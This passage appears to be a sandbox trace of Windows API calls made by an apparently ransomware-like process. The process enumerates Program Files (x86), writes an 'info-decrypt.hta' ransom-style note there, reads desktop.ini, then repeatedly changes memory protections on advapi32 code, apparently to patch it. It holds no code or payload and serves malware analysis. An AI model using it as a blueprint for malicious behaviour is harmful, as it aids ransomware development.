ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0133.850] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0133.850] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0133.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceee2c) returned 1 [0133.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceee38) returned 1 [0133.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceee6c) returned 1 [0133.851] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x6cee974, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0133.851] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x105, lpBuffer=0x6cee948, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x0) returned 0x17 [0133.851] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x6ceeb94 | out: lpFindFileData=0x6ceeb94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0133.851] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbc18160, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc18160, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa547efa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xa547efa0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbbcbea0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbbcbea0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbc18160, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc18160, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbcfc9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcfc9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xdbc3e2c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc3e2c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xdbcfc9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcfc9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xdbc64420, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc64420, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553ced90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcd6840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcd6840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xdbb7fbe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbb7fbe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbc3e2c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc3e2c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbb7fbe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbb7fbe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b7348a4, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b7348a4, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0133.855] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6ceeba4 | out: lpFindFileData=0x6ceeba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.855] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0133.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceee2c) returned 1 [0133.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceee38) returned 1 [0136.546] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6cee92c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0136.546] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6cee924, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0136.546] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee92c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\info-decrypt.hta", lpFilePart=0x0) returned 0x27 [0136.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceed8c) returned 1 [0136.546] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceee08 | out: lpFileInformation=0x6ceee08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed88) returned 1 [0136.546] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6cee924, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0136.546] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\info-decrypt.hta", lpFilePart=0x0) returned 0x27 [0136.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecc0) returned 1 [0136.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a8 [0136.547] GetFileType (hFile=0x3a8) returned 0x1 [0136.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecbc) returned 1 [0136.547] GetFileType (hFile=0x3a8) returned 0x1 [0136.547] WriteFile (in: hFile=0x3a8, lpBuffer=0x33f4650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6ceed84, lpOverlapped=0x0 | out: lpBuffer=0x33f4650*, lpNumberOfBytesWritten=0x6ceed84*=0x1000, lpOverlapped=0x0) returned 1 [0136.548] WriteFile (in: hFile=0x3a8, lpBuffer=0x33f4650*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6ceed58, lpOverlapped=0x0 | out: lpBuffer=0x33f4650*, lpNumberOfBytesWritten=0x6ceed58*=0x557, lpOverlapped=0x0) returned 1 [0136.548] CloseHandle (hObject=0x3a8) returned 1 [0136.548] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6cee8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0136.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceed54) returned 1 [0136.549] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x33f566c | out: lpFileInformation=0x33f566c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0136.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed50) returned 1 [0136.549] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6cee794, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0136.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec88) returned 1 [0136.549] CreateFileW (lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8 [0136.549] GetFileType (hFile=0x3a8) returned 0x1 [0136.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec84) returned 1 [0136.549] GetFileType (hFile=0x3a8) returned 0x1 [0136.549] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x6ceed90 | out: lpFileSizeHigh=0x6ceed90*=0x0) returned 0xae [0136.549] ReadFile (in: hFile=0x3a8, lpBuffer=0x33f58a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6ceed3c, lpOverlapped=0x0 | out: lpBuffer=0x33f58a8*, lpNumberOfBytesRead=0x6ceed3c*=0xae, lpOverlapped=0x0) returned 1 [0136.550] CloseHandle (hObject=0x3a8) returned 1 [0139.225] SysReAllocStringLen (in: pbstr=0x6cee098*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x6cee098*="advapi32") returned 1 [0139.225] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0139.225] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0139.226] GetLastError () returned 0x0 [0139.226] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.226] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.227] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x6cedf7c, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0139.227] GetCurrentProcess () returned 0xffffffff [0139.227] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711520, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.339] GetCurrentProcess () returned 0xffffffff [0139.339] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711520, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.339] GetCurrentProcess () returned 0xffffffff [0139.339] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711540, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.340] GetCurrentProcess () returned 0xffffffff [0139.340] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711540, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.340] GetCurrentProcess () returned 0xffffffff [0139.340] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x7771175c, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.341] GetCurrentProcess () returned 0xffffffff [0139.341] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x7771175c, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.341] GetCurrentProcess () returned 0xffffffff [0139.341] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711768, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.341] GetCurrentProcess () returned 0xffffffff [0139.341] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711768, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.342] GetCurrentProcess () returned 0xffffffff [0139.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117b8, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.342] GetCurrentProcess () returned 0xffffffff [0139.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117b8, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.343] GetCurrentProcess () returned 0xffffffff [0139.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117bc, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.343] GetCurrentProcess () returned 0xffffffff [0139.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117bc, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: 